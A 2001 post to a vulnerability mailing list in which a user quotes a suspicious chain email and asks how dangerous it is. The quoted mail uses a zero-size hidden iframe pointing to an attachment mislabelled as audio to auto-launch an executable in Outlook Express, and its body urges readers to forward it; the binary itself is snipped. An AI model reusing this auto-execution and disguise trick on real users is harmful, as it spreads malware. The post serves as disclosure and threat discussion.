Vulnerability Development mailing list archives
A very dangerous mail...
From: "Marius Huse Jacobsen" <mahuja () c2i net>
Date: Fri, 20 Jul 2001 23:24:19 +0200
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Edited to protect any innocents. Obvious forgery (supposedly from microsoft.com) I'm using ZoneAlarm MailSafe -> .exe changed to .zl9 It tries to start the attachment exe automatically (Outlook Express) - - it asks me if I want to save or start the zl9 file but I don't know what it would do to an exe. Exactly how bad is it? The offending line seems to be <iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe> Html email was a curse to begin with and it hasn't become any better. Can anyone give me that ascii ribbon sig? 8< --------- Start offending letter ----------- Return-Path: <zina () somewhereonthenet com> Received: from smtp08.somewhereonthenet.com (smtp08.somewhereonthenet.com [196.*.*.*]) by mail.my_isp.com (8.9.3/8.9.3) with ESMTP id PAA16304 for <my () mail addy>; Sat, 14 Jul 2001 15:10:00 +0200 (MET DST) Received: from microsoft.com ([196.*.*.*]) by smtp08.somewhereonthenet.com (Sun Internet Mail Server sims.3.5.2000.03.23.18.03.p10) with SMTP id <0GGG009BGSJHYE () smtp08 iafrica com> for my () mail addy; Sat, 14 Jul 2001 15:09:40 +0200 (SAT) Date: Sat, 14 Jul 2001 15:09:01 +0100 From: Lynda () smtp08 somewhereonthenet com Subject: Fw: 100,000 lemmings can't be ... To: removed () smtp08 somewhereonthenet com Message-id: <0GGG009BISJHYE () smtp08 somewhereonthenet com> MIME-version: 1.0 Content-type: multipart/mixed; boundary="nymph" This is a multi-part message in MIME format. - --nymph Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable <HTML> <HEAD> </HEAD> <BODY bgColor=3D#ffffff> <iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe> <P align=center><FONT size=7><SPAN class=590014113-13042001>SMACK!!!</SPAN></FONT></P> <P align=center><FONT size=7><SPAN class=590014113-13042001>You have been hit</SPAN></FONT></P> <P align=center><SPAN class=590014113-13042001>This is the funny-attachment war! You have just been hit and by the rule book you can't hit this person back. To be in the game you need to send this message to five of your friends, try to find some small and funny attachment to send along. If you don't have time use the one you got hit by, go ahead hit someone!</SPAN></P> <P align=center><FONT size=7><SPAN class=590014113-13042001></SPAN></FONT> </P></BODY></HTML> - --nymph Content-Type: audio/x-wav; name="setup.zl9" Content-Transfer-Encoding: base64 Content-ID: <THE-CID> <snip .exe content> - --nymph <snip fortune.zip> - --nymph-- -----BEGIN PGP SIGNATURE----- Version: PGP 7.0.4 iQA/AwUBO1ihZUcYTo91XF1EEQImJgCg5UccaNK/H1g27tAzUm23TayOfpQAnjDk sqjAlFfiJIKdd21U6wxArNXb =63JI -----END PGP SIGNATURE-----
Current thread:
- A very dangerous mail... Marius Huse Jacobsen (Jul 20)
- Re: A very dangerous mail... Nexus (Jul 25)
- <Possible follow-ups>
- RE: A very dangerous mail... Aidan O'Kelly (Jul 23)